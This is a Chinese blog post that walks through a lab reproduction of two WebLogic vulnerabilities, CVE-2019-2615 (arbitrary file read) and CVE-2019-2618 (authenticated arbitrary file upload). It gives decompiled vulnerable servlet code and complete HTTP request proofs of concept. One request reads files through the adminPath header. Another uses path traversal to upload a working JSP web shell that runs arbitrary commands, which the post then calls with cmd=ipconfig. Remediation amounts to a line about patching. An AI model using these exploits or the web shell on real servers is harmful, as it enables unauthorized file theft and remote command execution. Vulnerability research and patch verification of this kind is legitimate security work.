weblogic 文件打开数_Weblogic任意文件读取和任意文件上传

最新推荐文章于 2024-06-04 09:55:42 发布
最新推荐文章于 2024-06-04 09:55:42 发布
阅读量414 收藏 1
点赞数
文章标签: weblogic 文件打开数 weblogic 默认密码 weblogic安装 weblogic控制台默认密码 weblogic遇到无法识别的补丁程序id weblogic默认密码

引言

weblogic中两个CVE漏洞比较有意思,所以复现一下,该两个漏洞需要在poc中加入用户名和密码(cookie)才能实现。

2dc6c6326df26c568cf1554556a845ec.png

环境搭建

环境搭建: 首先安装weblogic 下载地址 http://www.oracle.com/technetwork/cn/middleware/weblogic/downloads/wls-main-091116-zhs.html

4c5cebf03aeedc980864f2fd4f82cc57.png

安装目录没特别需求可以不更改,一路下一步。

faff02173d3928cda9f265a45136fdfe.png

把复选框去掉:

ee8c242756b05b9640fa51180e3989f9.png

全选:

433575698404160f4f9e8df8c5da98c4.png

(已安装的图片)

d09a0e012a71bee93cb7512df05c9df6.png

(安装包捆绑在jdk1.6,上一步安装完成) 可以默认:

fab416d4b61e768e187fa067e4136f46.png

正在安装:

c28b95ec3fb372311731456106599b55.png

安装完成。

cab78398e8a2f7786557965848b141c8.png

打开Oracle然后选择Getting startedwith WebLogic Server:

e44edc310953be9e4a53fab4ab109206.png

配置weblogic界面:

1c25285122eae4787439a25fdfb37318.png

域源全选:

5da602c1d0bc3d52301d3c42326c5a1c.png

一直默认直到设置密码选项:

7479a6ed16179b26a53ef7178849890c.png

选择开发模式。

c08814869a13bee4c0d6edd07040b106.png

全选。

39a1c3720bc8880efafdb4a9462e35d5.png

剩下的默认就行 安装完毕。 在安装目录下找到启动程序。

4d0315b345f4ddf4477936dfe5e269cc.png

startWeblogic.cmd 启动成功后,试试能否访问weblogic控制台。 Url:http://192.168.219.131:7001/console/login/LoginForm.jsp

7762ca168c9cfcf75aa7dbdd4a7bc7a5.png

CVE-2019-2615任意文件读取

漏洞分析 该功能的关键代码在weblogic.management.servlet.FileDistributionServlet的 doGet()方法中:

public void doGet(final HttpServletRequest var1, final HttpServletResponsevar2) throws ServletException, IOException {

AuthenticatedSubject var3 = this.authenticateRequest(var1, var2);

if(var3 != null) {

final String var4 =var1.getHeader("wl_request_type");

if(var3 != KERNEL_ID) {

AdminResource var5 = newAdminResource("FileDownload", (String)null, var4);

if(!this.am.isAccessAllowed(var3, var5,(ContextHandler)null)) {

ManagementLogger.logErrorFDSUnauthorizedDownloadAttempt(var3.getName(), var4);

var2.sendError(401);

return;

}

}

try {

if(debugLogger.isDebugEnabled()) {

debugLogger.debug("---->doGet incoming request: " + var4);

}

if(var4.equals("wl_xml_entity_request")) {

this.doGetXMLEntityRequest(var1, var2);

} elseif(var4.equals("wl_jsp_refresh_request")) {

this.doGetJspRefreshRequest(var1, var2);

} else if(var4.equals("file")) {

this.doGetFile(var1, var2);

} elseif(!var4.equals("wl_init_replica_request") &&!var4.equals("wl_file_realm_request") &&!var4.equals("wl_managed_server_independence_request")) {

var2.addHeader("ErrorMsg", "Bad request type");

String var10 =Utils.encodeXSS(var4);

var2.sendError(400, "Bad requesttype: " + var10);

ManagementLogger.logBadRequestInFileDistributionServlet(var4);

} else {

......

......

}

}

} catch (Exception var9) {

if(!Kernel.isInitialized()) {

throw newAssertionError("kernel not initialized");

}

ManagementLogger.logErrorInFileDistributionServlet(var4, var9);

}

}

}

选取request中header的参数"wlrequesttype" 的值,然后判断如果该值等于“wlxmlentityrequest”、“wljsprefreshrequest”、 “file”…则分别调用各自的方法,进入下一步判断。如果wlrequesttype的值为“wljsprefresh_request” ,进入doGetJspRefreshRequest()方法:

private void doGetJspRefreshRequest(HttpServletRequest var1,HttpServletResponse var2) throws IOException {

String var3 = var1.getHeader("adminPath");

try {

FileInputStream var4 = new FileInputStream(var3);

try {

var2.setContentType("text/plain");

var2.setStatus(200);

this.returnInputStream(var4,var2.getOutputStream());

} finally {

var4.close();

}

} catch (IOException var10) {

String var5 = "I/O Exception getting resource:" + var10.getMessage();

var2.addHeader("ErrorMsg", var5);

var2.sendError(500, var5);

}

}

doGetJspRefreshRequest()方法中的“adminPath”也是request 中的header参数,在Post包中传入要读取的文件。进入该方法中,直接使用FileInputStream 类进行文件读取,故造成了所谓的“任意文件读取”漏洞。

漏洞复现 访问URL:http://192.168.219.131:7001/beawlsmanagementinternal2/wlmanagement 采用BurpSuite抓包:

2feefdc5ee58cd7cf81a45b5fee358bd.png

将POC加入包中:

3b69aa3f7c1787aabb86814cf1ac68e2.png

POC为:

GET /bea_wls_management_internal2/wl_management HTTP/1.1

Host: 192.168.219.131:7001

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36(KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3

Accept-Encoding: gzip, deflate

Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6

Connection: close

username:weblogic

password:12345678

wl_request_type:wl_jsp_refresh_request

adminPath:C:python27123.txt

Upgrade-Insecure-Requests: 1

发送该包发现:

686e1165879be63a2ec398901f714ec0.png

检查原机的文件发现:

911c1d559817e709602e5ec730dc5b34.png

修复建议 升级补丁。Oracle官方更新链接地址:https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html 。 或者直接删除了requestType的“wljsprefresh_request” 参数的判断,同时也删除了doGetJspRefreshRequest()方法。

CVE-2019-2618文件上传漏洞

漏洞分析 DeploymentServiceServlet类的handlePlanOrApplicationUpload()方法:

private final void handlePlanOrApplicationUpload(HttpServletRequest var1,HttpServletResponse var2, AuthenticatedSubject var3) throws IOException {

String var4 =mimeDecode(var1.getHeader("wl_upload_application_name"));

String var5 = ApplicationVersionUtils.getApplicationName(var4);

String var6 = ApplicationVersionUtils.getVersionId(var4);

String var7 = mimeDecode(var1.getHeader("wl_request_type"));

if(var5 == null) {

Loggable var24 =DeploymentServiceLogger.logRequestWithNoAppNameLoggable(var7);

logAndSendError(var2, 403, var24);

} else {

String var8 = var1.getContentType();

if(var8 != null &&var8.startsWith("multipart")) {

boolean var25 = false;

String var10 =var1.getHeader("wl_upload_delta");

if(var10 != null && var10.equalsIgnoreCase("true")){

var25 = true;

}

boolean var11 =var7.equals("plan_upload");

boolean var12 ="false".equals(var1.getHeader("archive"));

if(this.isDebugEnabled()) {

this.debug(var7 + "request for application " + var5 + " with archive: " + var12);

}

String var13 = null;

if(var6 == null || var6.length() == 0) {

var13 =this.getUploadDirName(var5, var6, var25, var11, var12);

}

if(var13 == null) {

var13 =this.getDefaultUploadDirName();

if(var13 == null) {

Loggable var26 =DeploymentServiceLogger.logNoUploadDirectoryLoggable(var7, var5);

logAndSendError(var2, 500, var26);

return;

}

var13 = var13 + var5 +File.separator;

if(var6 != null) {

var13 = var13 +var6 + File.separator;

}

}

if(this.isDebugEnabled()) {

this.debug(" +++ FinaluploadingDirName : " + var13);

}

boolean var14 = true;

String var15 = null;

......

......

} else {

Loggable var9 = DeploymentServiceLogger.logBadContentTypeServletRequestLoggable(var7,var8);

logAndSendError(var2, 400, var9);

}

}

}

该方法主要是对POST包中的传入的headers进行处理,主要作用包括:获取请求包中的“wluploadapplication_name” 参数,然后判断是否为空;判断“content-type”;构造上传路径等。

漏洞复现 访问漏洞URL: http://192.168.219.131:7001/beawlsdeploymentinternal/DeploymentService 并使用BurpSuite抓包。![15644692145d3fe7de0f48a.png](https://image.3001.net/images/20190730/15644692145d3fe7de0f48a.png)将发包方式改成POST方式写入POC:![15644692215d3fe7e5e25b8.png](https://image.3001.net/images/20190730/1564469221_5d3fe7e5e25b8.png)POC为:

POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1

Host: 192.168.219.131:7001

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

username: weblogic

wl_request_type: app_upload

cache-control: no-cache

wl_upload_application_name: /../tmp/_WL_internal/bea_wls_internal/9j4dqk/war

serverName: weblogic

password: 12345678

Content-Type: multipart/form-data; boundary=--------

archive: true

server_version: 10.3.6.0

wl_upload_delta: true

Content-Length: 1044

Content-Disposition: form-data; name="shell.jsp";filename="shell.jsp"

Content-Type: false

%>

Commands with JSP

if (request.getParameter("cmd") != null) {

out.println("Command: " +request.getParameter("cmd") + "
");

Process p;

if (System.getProperty("os.name").toLowerCase().indexOf("windows")!= -1){

p = Runtime.getRuntime().exec("cmd.exe /C " +request.getParameter("cmd"));

}

else{

p = Runtime.getRuntime().exec(request.getParameter("cmd"));

}

OutputStream os = p.getOutputStream();

InputStream in = p.getInputStream();

DataInputStream dis = new DataInputStream(in);

String disr = dis.readLine();

while ( disr != null ) {

out.println(disr);

disr = dis.readLine();

}

}

%>

发送数据包发现浏览器出现下图:

f27041316d8911231fdff5b60aaddf1f.png

访问URL:http://192.168.219.131:7001/beawlsinternal/shell.jsp?cmd=ipconfig

漏洞复现完成。

730d2f2aadcf12c0b5964c67e01d8501.png

修复方案 Oracle官方已经在关键补丁更新(CPU)中修复了该漏洞。

weixin_39586335
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现(vulhub漏洞复现) weblogic 文件读取漏洞
记录笔记
04-13 216
weblogic 文件读取漏洞 访问http://192.168.15.136:7001/hello/file.jsp?path=/etc/passwd可见成功读取passwd文件 GET /hello/file.jsp?path=security/SerializedSystemIni.dat HTTP/1.1 是一个二进制文件,所以一定要用burpsuite来读取,用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码,右键copy to file就可以保存成一个文件
101web漏洞挖掘之任意文件读取漏洞1
08-03
任意文件读取漏洞的根本原因在于程序设计时对客户端传递的参,如文件名或路径,缺乏有效的验证和过滤。例如,在一个URL中,`http://www.download.com/index.php?filename=code.php`,正常情况下,`filename`参应...
weblogic任意文件读取漏洞+后台任意上传
菜鸟耿耿
10-12 617
weblogic任意文件读取漏洞+后台任意上传 漏洞环境描述 本环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。分别通过这两种漏洞,模拟对weblogic场景的渗透。 影响版本: Weblogic版本:10.3.6(11g) Java版本:1.6 环境搭建 靶机IP: 192.168.35.144 攻击者IP:192.168.35.128 启动环境 docker-compose up -d 访问后台登陆页面:url:http://192.168.35.144
java获取上传的文件_java 文件上传读取文件内容的实例
weixin_35146121的博客
02-12 1428
1.下载文件,将文件保存到本地。(只试用excel);2.对文件的标题进行检验;3.获取导入的批次(取一个表的一个值,加1);4.循环获取文件某一个行,某一列的值,set到对象中;5.检验值的合法性;6.循环保存到对象中。7.用map将错误的信息和正确的信息,JSONObject.fromObject(map);public String uploadFile() throws Exception...
探索WebLogic安全之钥:CVE-2019-2618深度解析与实践
最新发布
gitblog_00097的博客
06-04 348
探索WebLogic安全之钥:CVE-2019-2618深度解析与实践 项目地址:https://gitcode.com/jas502n/cve-2019-2618 在信息安全的前沿阵地,每一个漏洞的发现都是对网络安全的一次警醒。今天,我们将深入探索一个影响深远的Oracle WebLogic Server漏洞——CVE-2019-2618。这个漏洞不仅考验着管理员的安全防护意识,也为安全研究者提...
中间件漏洞 | weblogic-弱口令/任意文件读取
weixin_52116519的博客
10-16 1458
一个基于JAVAEE架构的中间件,用于开发、集成、部署和管理大型分布式Web应用、网络应用和据库应用的Java应用服务器。通俗地讲weblogic是一种web容器,把我们开发的java应用程序运行起来,并提供服务。服务器:Microsoft Azure云服务器(学生优惠)操作系统:Linux (ubuntu 20.04)环境搭建:使用docker搭建vulhub,并使用weblogic靶场本环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。
Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
08-29 625
这个URL路径存在任意文件读取漏洞,现在我们知道了这个路径存在任意文件读取漏洞,那我们该如何利用这个漏洞呢?现在我们打开BP,点击进入 Repeater 重放模块,重放以下的据包获取密文(注意这里的主机IP和端口号要改成你靶机的IP和端口号)然后将文件选择为我们保存的111.dat文件,密文这里填写我们获得得密钥,然后点击确定,成功解密出密码。然后我们重新发送以下的据包,获取密钥文件(注意这里的主机IP和端口号要改成你靶机的IP和端口号)现在我们得到了密钥的文件,然后将其保存复制下来,后面解密会用到。
WebLogic_EXP.jar WebLogic反序列化利用工具
10-31
而"使用说明.txt"文件则提供了如何运行和使用这两个工具的详细步骤,包括目标服务器的配置,payload的生成,以及如何触发恶意反序列化操作等。 为了保护WebLogic服务器,管理员应该及时更新服务器到最新安全补丁,...
weblogic10.36反序列化补丁
01-24
WebLogic Server是Oracle公司的一款企业级Java应用服务器,它提供了用于构建、部署和管理企业级应用程序的全面平台。在WebLogic Server的安全性方面,反序列化漏洞是一个常见且严重的问题,因为它可能导致远程代码...
Weblogic XML反序列化漏洞CVE-2017-10271
04-16
Weblogic XML反序列化漏洞CVE-2017-10271是Oracle WebLogic Server中的一个严重安全问题,该漏洞允许攻击者通过精心构造的XML输入来远程执行代码,从而对受影响的系统造成破坏。这个漏洞主要涉及到WebLogic Server在...
Goby 最全最新POC共计448个
08-30
CNVD-2021-00876、Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109、XXL-JOB 任务调度中心 后台默认弱口令、帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757、锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞、蜂网...
weblogic 下解决文件读取
Open source of memory
06-22 130
      自己写了些sql 脚本的配置文件,以前在tomcat下可以从根目录获得所有这些配置文件,并在服务器启动时进行解析放到缓存。但在weblogic下就不行了!我在网上找过各种weblogic获得文件绝对路径的方案,但都是针对于单个文件读取的方案,不能解决批读取。于是想到了如下解决方案:       写一个xml配置文件来引用所有的之前的配置文件,并写一个类对用dom4j对这个配置文件进行...
Weblogic-弱口令+任意文件读取+Getshell漏洞复现
qq_44674058的博客
10-13 482
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和据库应用的Java应用服务器。
WebLogic10读取文件路径的问题
yishengreai的专栏
10-03 1699
以前在WebLogic8上面使用正常的项目,发布到WebLogic10上面报错,根据报错信息看,是未读取到配置文件。原来weblogic10不能识别用圆点分隔符标识的文件路径。 例如原配置里指定的文件路径写法: 需要修改成: 注意前面也要加个“/”,少了这个也是不行
任意文件读取和上传
weixin_43876438的博客
10-22 807
文章目录任意文件读取和上传任意文件读取危害存在位置防御手段例1例2任意文件上传危害防御手段绕过姿势前端JS校验代码校验例子 任意文件读取和上传 任意文件读取 任意文件读取,也可以称为任意文件下载或文件包含(File Inclusion),指的是代码中没有对参进行严格限制,导致攻击者可以通过目录穿越或修改读取文件名从而达到读取任意文件的目的 危害 配置文件泄露:攻击者通过任意文件读取漏洞查看配置文件,从而获取据库连接等相关的敏感信息;也可以读取业务代码,造成源码泄露 执行shell命令:攻击者首先
java接收前台tex格式t据,如何使用Java读取(.bib)文件格式的内容
weixin_35750483的博客
03-02 390
I need to read .bib file and insert it tags into an objects of bib-entriesthe file is big (almost 4000 lines) , so my first question is what to use (bufferrReader or FileReader)the general format is@A...
解析txt文件
qq_39176007的博客
11-03 366
public static void main(String[] args) { try { String encoding = "utf-8"; // 字符编码(可解决中文乱码问题 ) File file = new File("D:\\aaa.txt"); if (file.isFile() && file.exists()) { InputStreamReader r
Java读取txt文件
Syjavascript的博客
04-01 712
读取Txt文件并转换成实体类 这里是text文件的样例 //注意这里每一串的分割是tab键 \u0009 1 2003 Spring Soccer League (Spring '03) 2 2003 Summer Summer Soccer Fest 2003 3 2003 Autumn Autumn Soccer League (2003) 4 2004 Spring Soccer League (Spring '04) 5 2005 Summer The Summer of Soccer Love
java读取text文件
weixin_33775572的博客
06-19 180
2019独角兽企业重金招聘Python工程师标准>>> ...
weblogic任意上传文件漏洞补丁
07-21
对于WebLogic任意文件上传漏洞,建议您及时更新WebLogic服务器到最新版本,并参考Oracle官方文档、安全公告或与WebLogic官方支持团队联系,获取最新的补丁信息和安全更新。同时,还应该采取其他安全措施,如限制网络...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值